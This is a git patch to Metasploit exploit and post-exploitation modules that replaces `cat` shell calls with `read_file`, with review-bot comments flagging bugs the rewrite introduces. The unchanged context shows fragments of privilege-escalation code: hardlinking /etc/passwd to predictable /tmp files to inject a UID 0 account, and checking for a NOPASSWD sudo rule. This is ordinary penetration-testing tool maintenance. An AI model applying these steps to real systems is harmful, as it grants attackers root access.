From 2272e15ca2bcfb0f268c9dd6716413cc76d4901b Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Thu, 29 Sep 2016 00:15:01 +0200
Subject: [PATCH] Remove some anti-patterns, in the same spirit than #7372
---
 modules/exploits/linux/local/netfilter_priv_esc.rb | 2 +-
 modules/exploits/osx/local/rsh_libmalloc.rb | 2 +-
 modules/post/multi/escalate/metasploit_pcaplog.rb | 6 +++---
 3 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/modules/exploits/linux/local/netfilter_priv_esc.rb b/modules/exploits/linux/local/netfilter_priv_esc.rb
index 1332a75137..174200e7c5 100644
--- a/modules/exploits/linux/local/netfilter_priv_esc.rb
+++ b/modules/exploits/linux/local/netfilter_priv_esc.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
 def shemsham_installed?()
 # we want this to be false.
 vprint_status('Checking if shem or sham are installed')
- shemsham = cmd_exec('cat /proc/cpuinfo')
+ shemsham = read_file('/proc/cpuinfo')
 if shemsham.include?('shem')
 print_error('shem installed, system not vulnerable.')
 elsif shemsham.include?('sham')
diff --git a/modules/exploits/osx/local/rsh_libmalloc.rb b/modules/exploits/osx/local/rsh_libmalloc.rb
index 552003fd13..07ed515ebb 100644
--- a/modules/exploits/osx/local/rsh_libmalloc.rb
+++ b/modules/exploits/osx/local/rsh_libmalloc.rb
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
 vprint_status("Now to check whether the script worked...")
 # Check whether it worked
- crontab = cmd_exec("cat /etc/crontab")
+ crontab = read_file("/etc/crontab")
 vprint_status("Reading crontab yielded the following response: #{crontab}")
 unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
 vprint_error("Bad news... it did not write to the file.")
diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb
index 4466a0e513..558b886fa1 100644
--- a/modules/post/multi/escalate/metasploit_pcaplog.rb
+++ b/modules/post/multi/escalate/metasploit_pcaplog.rb
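Review bot: In `shemsham_installed?` (netfilter_priv_esc.rb), `shemsham.include?('shem')` is now called on whatever `read_file` returns, with no check that a string came back. The old `cmd_exec` result was used as a string; `read_file` is not defined in this patch, and if it can return nil on a failed read the method raises NoMethodError instead of reaching either branch. Coercing the result keeps the earlier behaviour, e.g. `shemsham = read_file('/proc/cpuinfo').to_s`. The same applies to `crontab.include?` in rsh_libmalloc.rb and to both `read_file("/etc/passwd").lines.count` calls in metasploit_pcaplog.rb. The body of `shemsham_installed?` continues past the end of the hunk.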
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Post
 def run
 print_status "Setting up the victim's /tmp dir"
- initial_size = cmd_exec("cat /etc/passwd | wc -l")
+ initial_size = read_file("/etc/passwd").lines.count
 print_status "/etc/passwd is currently #{initial_size} lines long"
 i = 0
 j = 0
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Post
 print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
 cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
 end
- current_size = cmd_exec("cat /etc/passwd | wc -l")
+ current_size = read_file("/etc/passwd").lines.count
 if current_size == initial_size
 # PCAP is flowing
 pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Post
 i = (i+1) % 60 # increment second counter
 end
- if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
+ if read_file("/etc/passwd").includes?("Metasploit")
 print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
 # TODO: Consider recording our now-created username and password as a valid credential here.
 else
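Review bot: `includes?` on the new `if` line of the last hunk (-92,7) is not a method of Ruby's String, so the check raises NoMethodError when `run` reaches it instead of taking either branch. The line should read `if read_file("/etc/passwd").include?("Metasploit")`. The replaced `cmd_exec` form always yielded a string containing "true" or "false", so this is a regression introduced by the rewrite, not a pre-existing problem. `run` starts above this hunk and the `else` branch continues below it.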